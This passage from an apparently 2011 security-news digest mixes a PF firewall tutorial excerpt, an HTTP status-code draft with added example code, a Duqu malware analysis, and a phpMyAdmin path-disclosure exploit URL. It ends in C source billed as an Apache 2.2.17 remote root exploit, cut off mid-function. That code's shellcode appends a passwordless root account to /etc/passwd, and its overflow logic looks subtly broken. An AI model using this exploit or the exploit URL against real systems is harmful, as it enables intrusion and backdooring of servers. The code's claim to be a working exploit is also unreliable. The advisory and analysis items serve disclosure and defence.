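# Added example, not from the original article. Wraps the article's
# "extract sound as MP3" command so that user-supplied names are always
# passed to ffmpeg as paths, never mistaken for options.

# A relative name that begins with "-" would be parsed by ffmpeg as a flag.
# Prefixing "./" keeps it a plain path; absolute paths are passed unchanged.
safe_path() {
    case "$1" in
        /*) printf '%s\n' "$1" ;;
        *)  printf '%s\n' "./$1" ;;
    esac
}

# Print the exact argument vector, one entry per line, that extract_audio
# would run. Kept separate so the construction can be inspected (and tested)
# on machines without ffmpeg installed.
extract_audio_argv() {
    src=$(safe_path "$1")
    dst=$(safe_path "$2")
    printf '%s\n' ffmpeg -i "$src" -vn -ar 44100 -ac 2 -ab 192 -f mp3 "$dst"
}

# Run the command when ffmpeg is available, otherwise just show it.
extract_audio() {
    if command -v ffmpeg >/dev/null 2>&1; then
        ffmpeg -i "$(safe_path "$1")" -vn -ar 44100 -ac 2 -ab 192 -f mp3 "$(safe_path "$2")"
    else
        extract_audio_argv "$1" "$2"
    fi
}
```

Usage: `extract_audio "-i.avi" sound.mp3` passes `./-i.avi` to ffmpeg, so the odd file name is opened as input instead of being parsed as a second `-i` flag. The same `safe_path` guard applies to every other command in the list.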
10. Firewalling with OpenBSD's PF packet filter

Peter N. M. Hansteen <peter _@_ bsdly.net>
Copyright 2005 - 2011 Peter N. M. Hansteen

Table of Contents

  Before we start
  PF? Packet filter? Firewall? NAT?
  PF today
  BSD vs Linux - Configuration
  Simplest possible setup (OpenBSD)
  Simplest possible setup (FreeBSD)
  Simplest possible setup (NetBSD)
  First rule set - single machine
  Slightly stricter
  Statistics from pfctl
  A simple gateway, NAT if you need it
  Gateways and the pitfalls of in, out and on
  What is your local network, anyway?
  Setting up
  That sad old FTP thing
  If We Have To: ftp-proxy With Redirection
  Historical FTP proxies: do not use
  Ancient FTP through NAT: ftp-proxy
  Ancient: FTP, PF and routable addresses: ftpsesame, pftpx and ftp-proxy!
  ftp-proxy, slightly new style
  Making your network troubleshooting friendly
  Then, do we let it all through?
  The easy way out: The buck stops here
  Letting ping through
  Helping traceroute
  Path MTU discovery
  Network hygiene: Blocking, scrubbing and so on
  block-policy
  scrub
  antispoof
  Handling non-routable addresses from elsewhere
  A web server and a mail server on the inside
  Taking care of your own - the inside
  Tables make your life easier
  Logging
  Taking a peek with tcpdump
  Other log tools you may want to look into
  But there are limits (an anecdote)
  Keeping an eye on things with systat
  Keeping an eye on things with pftop
  Invisible gateway - bridge
  Directing traffic with ALTQ
  ALTQ - prioritizing by traffic type
  So why does this work?
  Using a match Rule for Queue Assignment
  ALTQ - allocation by percentage
  ALTQ - handling unwanted traffic
  CARP and pfsync
  Wireless networks made simple
  A little IEEE 802.11 background
  WEP (Wired Equivalent Privacy)
  WPA (WiFi Protected Access)
  Setting up a simple wireless network
  An open, yet tightly guarded wireless network with authpf
  Turning away the brutes
  expiring table entries with pfctl
  Using expiretable to tidy your tables
  Giving spammers a hard time
  Remember, you are not alone: blacklisting
  List of black and grey, and the sticky tarpit
  Setting up spamd
  Some early highlights of our spamd experience
  Beating'em up some more: spamdb and greytrapping
  Enter greytrapping
  Your own traplist
  Deleting, handling trapped entries
  The downside: some people really do not get it
  Conclusions from our spamd experience
  PF - Haiku
  References
  Where to find the tutorial on the web
  If you enjoyed this: Buy OpenBSD CDs and other items, donate!

Before we start

This lecture[1] will be about firewalls and related functions, starting from a little theory along with a number of examples of filtering and other network traffic directing. As in any number of other endeavors, the things I discuss can be done in more than one way.

More information: The Book of PF, training, consulting

Most of the topics we touch on here are covered in more detail in The Book of PF, which was written by the same author and published by No Starch Press at the end of 2007, with a revised and updated second edition published in November 2010. The book is an expanded and extensively rewritten followup to this tutorial, and covers a range of advanced topics in addition to those covered here.

This tutorial is in minimal-maintenance mode, in that I'll occasionally make an effort to keep the information in it up to date, but it will not expand in scope. For more in-depth information or topics not covered here, check the book, the PF User Guide (also known as The PF FAQ) or the relevant man pages.
If you buy the book via The OpenBSD Bookstore, the OpenBSD project gets a slightly larger cut.

If you need PF related consulting or training, please contact me for further details. You may want to read my Rent-a-geek writeup too.

Under any circumstances I will urge you to interrupt me when you need to. That is, if you will permit me to use what I learn from your comments later, either in revised versions of this lecture or in practice at a later time.

PF?

What, then is PF? Let us start by looking briefly at the project's history to put things in their proper context.

OpenBSD's Packet Filter subsystem, which most people refer to simply by using the abbreviated form 'PF', was originally written in an effort of extremely rapid development during the northern hemisphere summer and autumn months of 2001 by Daniel Hartmeier and a number of OpenBSD developers, and was launched as a default part of the OpenBSD 3.0 base system in December of 2001.

The need for a new firewalling software subsystem for OpenBSD arose when Darren Reed announced to the world that IPFilter, which at that point had been rather intimately integrated in OpenBSD, was not after all BSD licensed. In fact quite to the contrary. The license itself was almost a word by word copy of the BSD license, omitting only the right to make changes to the code and distribute the result. The OpenBSD version of IPFilter contained quite a number of changes and customizations, which it turned out were not allowed according to the license. IPFilter was removed from the OpenBSD source tree on May 29th, 2001, and for a few weeks OpenBSD-current did not contain any firewalling software.

Fortunately, in Switzerland Daniel Hartmeier was already doing some limited experiments involving kernel hacking in the networking code. His starting point was hooking a small function of his own into the networking stack, making packets pass through it, and after a while he had started thinking about filtering.

Then the license crisis happened. IPFilter was pruned from the source tree on May 29th. The first commit of the PF code happened Sunday, June 24 2001 at 19:48:58 UTC.[2]

A few months of rather intense activity followed, and the version of PF to be released with OpenBSD 3.0 contained a rather complete implementation of packet filtering, including network address translation.

From the looks of it, Daniel Hartmeier and the other PF developers made good use of their experience with the IPFilter code. Under any circumstances Daniel presented a USENIX 2002 paper with performance tests which show that the OpenBSD 3.1 PF performed equally well as or better under stress than IPFilter on the same platform or iptables on Linux. In addition, some tests were run on the original PF from OpenBSD 3.0. These tests showed mainly that the code had gained in efficiency from version 3.0 to version 3.1. The article which provides the details is available from Daniel Hartmeier's web, see http://www.benzedrine.cx/pf-paper.html.

I have not seen comparable tests performed recently, but in my own experience and that of others, the PF filtering overhead is pretty much negligible. As one data point, the machine which gateways between one of the networks where I've done a bit of work and the world is a Pentium III 450MHz with 384MB of RAM. When I've remembered to check, I've never seen the machine at less than 96 percent 'idle' according to top.

It is however worth noting that various optimisations have been introduced to OpenBSD's PF code during recent releases (mainly by the current main PF developers Henning Brauer and Ryan McBride with contributions from others), making each release from 4.4 through 4.9 perform better than its predecessors.

...

Online: http://home.nuug.no/~peter/pf/en/long-firewall.html
11. RTCA : Portable Windows forensic analysis tool

OCTOBER 20, 2011 13:13 PM by BLACK

RTCA is a Windows forensic analysis tool for the registry, audit logs and files. RTCA is basically a standalone and portable application for extraction and analysis investigation; it can be used for a local configuration report or for analysis after extraction. As it analyses after extraction, analysis is fast and accurate.

Features of RTCA

  - Compatible with Windows XP, Vista, 2003, 2008, 7, 8 32-bit (64-bit version will be compiled) and 90% ok under Wine.
  - Can be run in command line.
  - Processing and copies of registry files (damaged registry too).
  - System information: bootKeys/syskey, security features, serials MS...
  - Applications, updates, list of services, drivers, and USB...
  - UserAssist (command history performed by each user).
  - Applications at startup.
  - Network configuration, wireless and SSID.
  - List of accounts, users and hash passwords.
  - Passwords stored in the registry (eg VNC).
  - Most Recent Used historical paths.
  - Registry Viewer Lite.
  - Processing of local logs file, evt (Windows= Vista) and log (format linux / unix).
  - File system extraction (file and directory): acls, hidden and protected system state.
  - Files explorer lite.
  - Processes and associated network ports.
  - Synthesis (audit logs, file and registry) sorted by date.
  - Export / Import results in CSV, HTML and XML.

Download: http://omnia-projetcs.googlecode.com/svn/trunk/RTCA/RtCA.exe

Source: http://www.pentestit.com/rtca-portable-windows-forensic-analysis-tool/
12. Internet-Draft - Additional HTTP Status Codes

Network Working Group                                      M. Nottingham
Internet-Draft                                                 Rackspace
Updates: 2616 (if approved)                                  R. Fielding
Intended status: Standards Track                                   Adobe
Expires: April 20, 2012                                 October 18, 2011

                      Additional HTTP Status Codes
                   draft-nottingham-http-new-status-02

Abstract

   This document specifies additional HyperText Transfer Protocol (HTTP)
   status codes for a variety of common situations.

Status of this Memo

   This Internet-Draft is submitted in full conformance with the
   provisions of BCP 78 and BCP 79.
   Internet-Drafts are working documents of the Internet Engineering
   Task Force (IETF). Note that other groups may also distribute working
   documents as Internet-Drafts. The list of current Internet-Drafts is
   at http://datatracker.ietf.org/drafts/current/.

   Internet-Drafts are draft documents valid for a maximum of six months
   and may be updated, replaced, or obsoleted by other documents at any
   time. It is inappropriate to use Internet-Drafts as reference
   material or to cite them other than as "work in progress."

   This Internet-Draft will expire on April 20, 2012.

Copyright Notice

   Copyright (c) 2011 IETF Trust and the persons identified as the
   document authors. All rights reserved.

   This document is subject to BCP 78 and the IETF Trust's Legal
   Provisions Relating to IETF Documents
   (http://trustee.ietf.org/license-info) in effect on the date of
   publication of this document. Please review these documents
   carefully, as they describe your rights and restrictions with respect
   to this document. Code Components extracted from this document must
   include Simplified BSD License text as described in Section 4.e of
   the Trust Legal Provisions and are provided without warranty as
   described in the Simplified BSD License.

Nottingham & Fielding    Expires April 20, 2012    [Page 1]

Internet-Draft    Additional HTTP Status Codes    October 2011

Table of Contents

   1. Introduction . . . . . . . . . . . . . . . . . . . . . . . . . 3
   2. Requirements . . . . . . . . . . . . . . . . . . . . . . . . . 3
   3. 428 Precondition Required . . . . . . . . . . . . . . . . . . . 3
   4. 429 Too Many Requests . . . . . . . . . . . . . . . . . . . . . 4
   5. 431 Request Header Fields Too Large . . . . . . . . . . . . . . 4
   6. 511 Network Authentication Required . . . . . . . . . . . . . . 5
   7. Security Considerations . . . . . . . . . . . . . . . . . . . . 6
   8. IANA Considerations . . . . . . . . . . . . . . . . . . . . . . 7
   9. References . . . . . . . . . . . . . . . . . . . . . . . . . . 7
      9.1. Normative References . . . . . . . . . . . . . . . . . . . 7
      9.2. Informative References . . . . . . . . . . . . . . . . . . 8
   Appendix A. Acknowledgements . . . . . . . . . . . . . . . . . . . 8
   Appendix B. Issues Raised by Captive Portals . . . . . . . . . . . 8
   Authors' Addresses . . . . . . . . . . . . . . . . . . . . . . . . 9

1. Introduction

   This document specifies additional HTTP [RFC2616] status codes for a
   variety of common situations, to improve interoperability and avoid
   confusion when other, less precise status codes are used.

   Feedback should occur on the ietf-http-wg@w3.org mailing list,
   although this draft is NOT a work item of the IETF HTTPbis Working
   Group.

2. Requirements

   The key words "MUST", "MUST NOT", "REQUIRED", "SHALL", "SHALL NOT",
   "SHOULD", "SHOULD NOT", "RECOMMENDED", "MAY", and "OPTIONAL" in this
   document are to be interpreted as described in [RFC2119].

3. 428 Precondition Required

   This status code indicates that the origin server requires the
   request to be conditional.

   Its typical use is to avoid the "lost update" problem, where a client
   GETs a resource's state, modifies it, and PUTs it back to the server,
   when meanwhile a third party has modified the state on the server,
   leading to a conflict. By requiring requests to be conditional, the
   server can assure that clients are working with the correct copies.

   Responses using this status code SHOULD explain how to resubmit the
   request successfully. For example:

   HTTP/1.1 428 Precondition Required
   Content-Type: text/html

   <html>
      <head>
         <title>Precondition Required</title>
      </head>
      <body>
         <h1>Precondition Required</h1>
         <p>This request is required to be conditional; try using "If-Match".</p>
      </body>
   </html>

   Responses with the 428 status code MUST NOT be stored by a cache.

4. 429 Too Many Requests

   This status code indicates that the user has sent too many requests
   in a given amount of time ("rate limiting").

   The response representations SHOULD include details explaining the
   condition, and MAY include a Retry-After header indicating how long
   to wait before making a new request. For example:

   HTTP/1.1 429 Too Many Requests
   Content-Type: text/html
   Retry-After: 3600

   <html>
      <head>
         <title>Too Many Requests</title>
      </head>
      <body>
         <h1>Too many Requests</h1>
         <p>I only allow 50 requests per hour to this Web site per logged in user. Try again soon.</p>
      </body>
   </html>

   Note that this specification does not define how the origin server
   identifies the user, nor how it counts requests. For example, an
   origin server that is limiting request rates can do so based upon
   counts of requests on a per-resource basis, across the entire server,
   or even among a set of servers. Likewise, it might identify the user
   by its authentication credentials, or a stateful cookie.

   Responses with the 429 status code MUST NOT be stored by a cache.

5. 431 Request Header Fields Too Large

   This status code indicates that the server is unwilling to process
   the request because its header fields are too large. The request MAY
   be resubmitted after reducing the size of the request header fields.

   It can be used both when the set of request header fields in total
   are too large, and when a single header field is at fault. In the
   latter case, the response representation SHOULD specify which header
   field was too large. For example:

   HTTP/1.1 431 Request Header Fields Too Large
   Content-Type: text/html

   <html>
      <head>
         <title>Request Header Fields Too Large</title>
      </head>
      <body>
         <h1>Request Header Fields Too Large</h1>
         <p>The "Example" header was too large.</p>
      </body>
   </html>

   Responses with the 431 status code MUST NOT be stored by a cache.

6. 511 Network Authentication Required

   This status code indicates that the client needs to authenticate to
   gain network access.

   The response representation SHOULD indicate how to do this; e.g.,
   with an HTML form for submitting credentials.

   The 511 status SHOULD NOT be generated by origin servers; it is
   intended for use by intercepting proxies that are interposed as a
   means of controlling access to the network.

   Responses with the 511 status code MUST NOT be stored by a cache.

6.1. The 511 Status Code and Captive Portals

   A network operator wishing to require some authentication, acceptance
   of terms or other user interaction before granting access usually
   does so by identifying clients who have not done so ("unknown
   clients") using their MAC addresses.

   Unknown clients then have all traffic blocked, except for that on TCP
   port 80, which is sent to an HTTP server (the "login server")
   dedicated to "logging in" unknown clients, and of course traffic to
   the login server itself.

   For example, a user agent might connect to a network and make the
   following HTTP request on TCP port 80:

   GET /index.htm HTTP/1.1
   Host: www.example.com

   Upon receiving such a request, the login server would generate a 511
   response:

   HTTP/1.1 511 Network Authentication Required
   Refresh: 0; url=https://login.example.net/
   Content-Type: text/html

   <html>
      <head>
         <title>Network Authentication Required</title>
      </head>
      <body>
         <p>You need to <a href="https://login.example.net/">
         authenticate with the local network</a> in order to get
         access.</p>
      </body>
   </html>

   Here, the 511 status code assures that non-browser clients will not
   interpret the response as being from the origin server, and the
   Refresh header redirects the user agent to the login server (an HTML
   META element can be used for this as well).
   Note that the 511 response can itself contain the login interface,
   but it may not be desirable to do so, because browsers would show the
   login interface as being associated with the originally requested
   URL, which may cause confusion.

7. Security Considerations

7.1. 428 Precondition Required

   The 428 status code is optional; clients cannot rely upon its use to
   prevent "lost update" conflicts.

7.2. 429 Too Many Requests

   Servers are not required to use the 429 status code; when limiting
   resource usage, it may be more appropriate to just drop connections,
   or take other steps.

7.3. 431 Request Header Fields Too Large

   Servers are not required to use the 431 status code; when under
   attack, it may be more appropriate to just drop connections, or take
   other steps.

7.4. 511 Network Authentication Required

   In common use, a response carrying the 511 status code will not come
   from the origin server indicated in the request's URL. This presents
   many security issues; e.g., an attacking intermediary may be
   inserting cookies into the original domain's name space, may be
   observing cookies or HTTP authentication credentials sent from the
   user agent, and so on.

   However, these risks are not unique to the 511 status code; in other
   words, a captive portal that is not using this status code introduces
   the same issues.

8. IANA Considerations

   The HTTP Status Codes Registry should be updated with the following
   entries:

   o Code: 428
     Description: Precondition Required
     Specification: [ this document ]

   o Code: 429
     Description: Too Many Requests
     Specification: [ this document ]

   o Code: 431
     Description: Request Header Fields Too Large
     Specification: [ this document ]

   o Code: 511
     Description: Network Authentication Required
     Specification: [ this document ]

9. References

9.1. Normative References

   [RFC2119] Bradner, S., "Key words for use in RFCs to Indicate
             Requirement Levels", BCP 14, RFC 2119, March 1997.

   [RFC2616] Fielding, R., Gettys, J., Mogul, J., Frystyk, H., Masinter,
             L., Leach, P., and T. Berners-Lee, "Hypertext Transfer
             Protocol -- HTTP/1.1", RFC 2616, June 1999.

9.2. Informative References

   [RFC4791] Daboo, C., Desruisseaux, B., and L. Dusseault, "Calendaring
             Extensions to WebDAV (CalDAV)", RFC 4791, March 2007.

   [RFC4918] Dusseault, L., "HTTP Extensions for Web Distributed
             Authoring and Versioning (WebDAV)", RFC 4918, June 2007.

Appendix A. Acknowledgements

   Thanks to Jan Algermissen for his suggestions and feedback. The
   authors take all responsibility for errors and omissions.

Appendix B. Issues Raised by Captive Portals

   Since clients cannot differentiate between a portal's response and
   that of the HTTP server that they intended to communicate with, a
   number of issues arise.

   One example is the "favicon.ico" <http://en.wikipedia.org/wiki/Favicon>
   commonly used by browsers to identify the site being accessed. If the
   favicon for a given site is fetched from a captive portal instead of
   the intended site (e.g., because the user is unauthenticated), it
   will often "stick" in the browser's cache (most implementations cache
   favicons aggressively) beyond the portal session, so that it seems as
   if the portal's favicon has "taken over" the legitimate site.

   Another browser-based issue comes about when P3P
   <http://www.w3.org/TR/P3P/> is supported. Depending on how it is
   implemented, it's possible a browser might interpret a portal's
   response for the p3p.xml file as the server's, resulting in the
   privacy policy (or lack thereof) advertised by the portal being
   interpreted as applying to the intended site.
   Other Web-based protocols such as WebFinger
   <http://code.google.com/p/webfinger/wiki/WebFingerProtocol>, CORS
   <http://www.w3.org/TR/cors/> and OAuth
   <http://tools.ietf.org/html/draft-ietf-oauth-v2> may also be
   vulnerable to such issues.

   Although HTTP is most widely used with Web browsers, a growing number
   of non-browsing applications use it as a substrate protocol. For
   example, WebDAV [RFC4918] and CalDAV [RFC4791] both use HTTP as the
   basis (for network filesystem access and calendaring, respectively).

   Using these applications from behind a captive portal can result in
   spurious errors being presented to the user, and might result in
   content corruption, in extreme cases.

   Similarly, other non-browser applications using HTTP can be affected
   as well; e.g., widgets <http://www.w3.org/TR/widgets/>, software
   updates, and other specialised software such as Twitter clients and
   the iTunes Music Store.

   It should be noted that it's sometimes believed that using HTTP
   redirection to direct traffic to the portal addresses these issues.
   However, since many of these uses "follow" redirects, this is not a
   good solution.

Authors' Addresses

   Mark Nottingham
   Rackspace

   Email: mnot@mnot.net
   URI:   http://www.mnot.net/

   Roy T. Fielding
   Adobe Systems Incorporated
   345 Park Ave
   San Jose, CA 95110
   USA

   Email: fielding@gbiv.com
   URI:   http://roy.gbiv.com/

Source: draft-nottingham-http-new-status-02 - Additional HTTP Status Codes
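To see what a server actually has to keep track of to emit these four codes, here is an added example in Python (my own code, not from the draft or its authors): an in-memory origin with one resource, ETag-based conditional PUT (428 and 412), a sliding-window rate limiter with Retry-After (429), header-size limits that name the offending field (431), and the 511 response an intercepting proxy would send. The byte limits, the ETag derivation, the "50 requests per hour" quota and every name here are assumptions made for illustration; header-name matching is exact-case for brevity where real HTTP is case-insensitive.

```python
"""Added example, not the draft's or its authors' code: pure functions
returning (status, headers, body) so the four status codes can be
exercised offline. All limits and names are constructed assumptions."""
import hashlib
import time

MAX_FIELD_BYTES = 8192      # assumed per-header-field limit
MAX_HEADERS_BYTES = 32768   # assumed limit for the whole header block
RATE_LIMIT = 50             # the draft's example text: 50 requests/hour/user
RATE_WINDOW = 3600.0        # seconds

# Every response the draft defines MUST NOT be stored by a cache.
NO_STORE = {"Cache-Control": "no-store", "Content-Type": "text/plain"}


class Server:
    """Tiny origin: one resource at /doc, ETag conditional PUT,
    per-user rate limiting and request-header size limits."""

    def __init__(self, clock=time.time):
        self.body = b"v1"
        self.hits = {}          # user -> timestamps of recent requests
        self.clock = clock      # injectable for deterministic tests

    def etag(self):
        # Strong ETag derived from content; any scheme that changes
        # with the representation would do.
        return '"%s"' % hashlib.sha256(self.body).hexdigest()[:16]

    def check_header_size(self, headers):
        """431: reject over-sized header fields, naming the culprit."""
        total = 0
        for name, value in headers.items():
            size = len(name) + len(value) + 4          # ": " + CRLF
            total += size
            if size > MAX_FIELD_BYTES:
                return 431, dict(NO_STORE), 'The "%s" header was too large.' % name
        if total > MAX_HEADERS_BYTES:
            return 431, dict(NO_STORE), "Request header fields are too large in total."
        return None

    def check_rate(self, user):
        """429: sliding window; Retry-After is when the oldest hit expires."""
        now = self.clock()
        recent = [t for t in self.hits.get(user, []) if now - t < RATE_WINDOW]
        if len(recent) >= RATE_LIMIT:
            retry_after = int(RATE_WINDOW - (now - recent[0])) + 1
            hdrs = dict(NO_STORE, **{"Retry-After": str(retry_after)})
            return 429, hdrs, "Only %d requests per hour per user." % RATE_LIMIT
        recent.append(now)
        self.hits[user] = recent
        return None

    def handle(self, method, path, headers, body=b"", user="anonymous"):
        """Return (status, headers, text) for one request."""
        resp = self.check_header_size(headers)   # cheapest check first
        if resp:
            return resp
        resp = self.check_rate(user)
        if resp:
            return resp
        if path != "/doc":
            return 404, {}, "Not Found"
        if method == "GET":
            return 200, {"ETag": self.etag()}, self.body.decode()
        if method == "PUT":
            # 428: an unconditional PUT could silently overwrite a newer
            # version (the "lost update" problem), so insist on If-Match.
            if_match = headers.get("If-Match")
            if if_match is None:
                return (428, dict(NO_STORE),
                        'This request is required to be conditional; try using "If-Match".')
            if if_match != self.etag():
                return 412, {}, "Precondition Failed"   # client holds a stale copy
            self.body = body
            return 204, {"ETag": self.etag()}, ""
        return 405, {}, "Method Not Allowed"


def captive_portal_response(login_url):
    """511 as an intercepting proxy sends it: the status tells non-browser
    clients this is not the origin's answer; Refresh sends browsers to login."""
    hdrs = dict(NO_STORE, **{"Refresh": "0; url=" + login_url,
                             "Content-Type": "text/html"})
    html = ('<html><body><p>You need to <a href="%s">authenticate with the '
            'local network</a> in order to get access.</p></body></html>' % login_url)
    return 511, hdrs, html
```

The ordering in `handle` matters: the header-size check runs before any work is done on the request, and a rejected request is not counted against the rate limit. A real deployment would compare header names case-insensitively and weigh the request before fully parsing it, as section 7.3 suggests, dropping the connection rather than answering when under load.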
13. Phishing page hacked, turned into PSA on the dangers of phishing

THURSDAY, OCTOBER 20, 2011

Here's something you don't see very often. Someone - perhaps the recipient of the below phishing mail while having a Falling Down style day at the office - decided enough was enough and set out to hijack the phishing site they were sent to.

This is the email that started it all:

"You have exceeded the storage limit on your mailbox. You will not be able to send or receive new mail until you upgrade your email. Click the below link and fill the form to upgrade your account. System Administrator"

Clicking the link would have taken you to the below phishing form that asks for Username, Password and Email address (along with password verification).

Now? Well, it looks a little bit different:

The original boxes are gone, replaced by the following message:

"There is no such thing as a central email service update a stupid criminal created this to steal your email account I have modified it to educate you about online crime he does not like that but that is too damn bad you can submit this form to see a helpful video about phishing stop letting stupid criminals like this one hijack your account have a great day"

Hitting the submit button takes you to a warning video about Phishing scams on CNET.

There's no indication left as to how the person now in control of the site obtained the login credentials. Phishing the phisher, perhaps? It does happen from time to time...

Author: Christopher Boyd (Thanks to Robert and Wendy for this one)

Source: GFI LABS Blog: Phishing page hacked, turned into PSA on the dangers of phishing
14. The Day of the Golden Jackal - The Next Tale in the Stuxnet Files: Duqu

Tuesday, October 18, 2011 at 10:49am by Guilherme Venere and Peter Szor

Stuxnet was possibly the most complex attack of this decade, and we expected that similar attacks would appear in the near future. One thing for sure is that the Stuxnet team is still active–as recent evidence has revealed. McAfee Labs received a kit from an independent team of researchers that is closely related to the original Stuxnet worm, but with a different goal–to be used for espionage and targeted attacks against sites such as Certificate Authorities (CAs).

How do we know it was the Stuxnet team? To start with, the attacks are targeting CAs in regions occupied by “Canis Aureus,” the Golden Jackal, to execute professional targeted attacks, against sites such as CAs. The Stuxnet worm utilized two “stolen” digital certificates belonging to two companies from Taiwan that operated in the same business district. Yet, the Stuxnet-related code, named Duqu, which McAfee Labs received as part of an on-going investigation, was signed with yet another key belonging to the company C-Media Electronics, in Taipei. It is highly likely that this key, just like the previous two known cases, was not really stolen from the actual companies, but instead directly generated in the name of such companies at a CA as part of a direct attack.

The threat that we call Duqu is based on Stuxnet and is very similar. Only a few sites so far are known to have been attacked by the code, and it does not have PLC functionality like Stuxnet. Instead, the code, delivered via exploitation, installs drivers and encrypted DLLs that function very similarly to the original Stuxnet code. In fact, the new driver’s code used for the injection attack is very similar to Stuxnet, as are several encryption keys and techniques that were used in Stuxnet. Duqu is very time sensitive, and is controlled by an extended, encrypted configuration file.
It communicates with a command server in India. This IP address has since been blacklisted at the ISP and no longer functions. Yet it was specially crafted to execute sophisticated attacks against key targets and has remote control functionality to install new code on the target. These include keyloggers, which can monitor all actions on systems: running processes, window messages, and so on. Furthermore, the keylogger component also contains functionality to hide files with a user-mode rootkit.

The file names of the SYS drivers can be cmi4432.sys and jminet7.sys. They relate to two groups of files that have similar functionality. A third file implements the keylogging functions. McAfee detects the packages as PWS-Duqu, PWS-Duqu.dr, and PWS-Duqu!rootkit.

Both SYS files have almost the exact same code, with a few differences. The main difference is the fact that one of them is digitally signed with a certificate belonging to C-Media, while the other is not. Here is an example of the certificate that seemingly belongs to C-Media:

Since the discovery of this malware, the certificate above has been revoked by VeriSign as we can see in the image below:

Certificate revoked by VeriSign

The purpose of the SYS file seems to be only to decrypt and execute the primary payload DLL. Each SYS file works with a different set of files that in turn generate different DLLs. The graph below shows the connections found between the samples so far:

File relationships for PWS-Duqu

As we can see above, the method used by both SYS files is very similar. The PNF file is an encrypted DLL that is decrypted and injected into arbitrary system processes. This DLL in turn decrypts another DLL that contains the malicious code used to hide the presence of the malware in memory. Both groups above also contain another module, sortXXXX.nls (where XXXX can be any hexadecimal character), shown in red above.
It seems to be responsible for the malware’s malicious activities, such as command and control communications.

The keylogger module works a little differently from the SYS files, but it also uses a module with the same name as the other components. This file is hidden using the same method as the other modules. Although the files are different, both rootkits work more or less in the same way. Another relationship among the keylogger and the other two modules is that each uses the same decryption key for the strings stored in its data section. The strings indicate these modules have the capability to disable security tools, targeting some specific antivirus products.

McAfee Labs advises Certificate Authorities to carefully verify if their systems might have been affected by this threat or any variations. As we publish this blog, McAfee Labs has also identified a likely variation of this attack at another site.

McAfee Labs would like to thank the independent team working on the investigation of this case and their contributions to our research.

Source: https://blogs.mcafee.com/mcafee-labs/the-day-of-the-golden-jackal-%E2%80%93-further-tales-of-the-stuxnet-files
15. phpMyAdmin 3.4.5 – Full path disclosure in phpmyadmin.css.php

phpMyAdmin 3.4.5 suffers from insufficient input validation of the parameter js_frame in phpmyadmin.css.php, exposing information that could be used in further attacks.

CVE Entry: CVE-2011-3646
CWE: CWE-20, CWE-200
PMASA ENTRY: PMASA-2011-15

=========
Description

The script returns an error message, containing the full path, if the js_frame parameter is defined as an array.

=========
Exploit

No authentication needed to exploit this vulnerability.

http://example.com/path_to_phpmyadmin/phpmyadmin.css.php?js_frame[]=right

=========
Official fix

http://phpmyadmin.git.sourceforge.net/git/gitweb.cgi?p=phpmyadmin/phpmyadmin;a=commitdiff;h=d35cba980893aa6e6455fd6e6f14f3e3f1204c52

=========
Credits

Discovered by Mihail Ursu ( http://securitate.md/ ) on 12 Sep 2011.

=========
Disclosure Timeline

Reported to vendor on 12 Sep 2011.
Confirmation from vendor 21 Sep 2011.
Patch confirmation 4 Oct 2011.
Official fix and public disclosure 17 Oct 2011.

Source: http://seclists.org/fulldisclosure/2011/Oct/690

It can be very useful.
16. DNS Poisoning via Port Exhaustion

Hey,

Today we are releasing a very interesting whitepaper which describes a DNS poisoning attack against stub resolvers. It discloses two vulnerabilities:

1. A vulnerability in Java (CVE-2011-3552, CVE-2010-4448) which enables remote DNS poisoning using Java applets. This vulnerability can be triggered when opening a malicious webpage. A successful exploitation of this vulnerability may lead to disclosure and manipulation of cookies and web pages, disclosure of NTLM credentials and clipboard data of the logged-on user, and even firewall bypass.

2. A vulnerability in multiuser Windows environments which enables local DNS cache poisoning of arbitrary domains. This vulnerability can be triggered by a normal user (i.e. one with non-administrative rights) in order to attack other users of the system. A successful exploitation of this vulnerability may lead to information disclosure, privilege escalation, universal XSS and more.

Whitepaper: http://bit.ly/q31wSq
A blog post with video demos: IBM Rational Application Security Insider: DNS poisoning via Port Exhaustion
Download: http://blog.watchfire.com/files/dnsp_port_exhaustion.pdf

Roee Hay <roeeh () il ibm com>, IBM Rational Application Security Research Group
Yair Amit <yairam () gmail com>

Source: Full Disclosure: DNS Poisoning via Port Exhaustion
17. Apache 2.2.17 remote root exploit

/* apachesm4sh.c apache 2.2.17 remote root exploit*/
/* KEEP PRIV8&!&! leak and i will find you ~ desg */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <netdb.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

char evil[] =
"\xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88\x46\x47\x89"
"\x76\x49\x8d\x5e\x08\x89\x5e\x4d\x8d\x5e\x0b\x89\x5e\x51\x89"
"\x46\x55\xb0\x0b\x89\xf3\x8d\x4e\x49\x8d\x56\x55\xcd\x80\xe8"
"\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x2d\x63\x23"
"\x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x77\x30\x30\x30\x74"
"\x3a\x3a\x30\x3a\x30\x3a\x73\x34\x66\x65\x6d\x30\x64\x65\x3a"
"\x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68"
"\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
"\x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43\x44\x44"
"\x44\x44";

#define NOP 0x90
#define BSIZE 1000
#define OFFSET 400
#define ADDR 0xbffff658
#define ASIZE 2000

int main(int argc, char *argv[])
{
    char *buffer;
    int s;
    struct hostent *hp;
    struct sockaddr_in sin;

    if (argc != 2) {
        printf("%s <target>\n", argv[0]);
        exit(1);
    }
    buffer = (char *) malloc(BSIZE + ASIZE + 100);
    if (buffer == NULL) {
        printf("Not enough memory\n");
        exit(1);
    }
    memcpy(&buffer[BSIZE - strlen(evil)], evil, strlen(evil));
    buffer[BSIZE + ASIZE] = ';';
    buffer[BSIZE + ASIZE + 1] = '\0';
    hp = gethostbyname(argv[1]);
    if (hp == NULL) {
        printf("no such server\n");
        exit(1);
    }
    bzero(&sin, sizeof(sin));
    bcopy(hp->h_addr, (char *)&sin.sin_addr, hp->h_length);
    sin.sin_family = AF_INET;
    sin.sin_port = htons(80);
    s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (s < 0) {
        printf("Can't open socket\n");
        exit(1);
    }
    if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
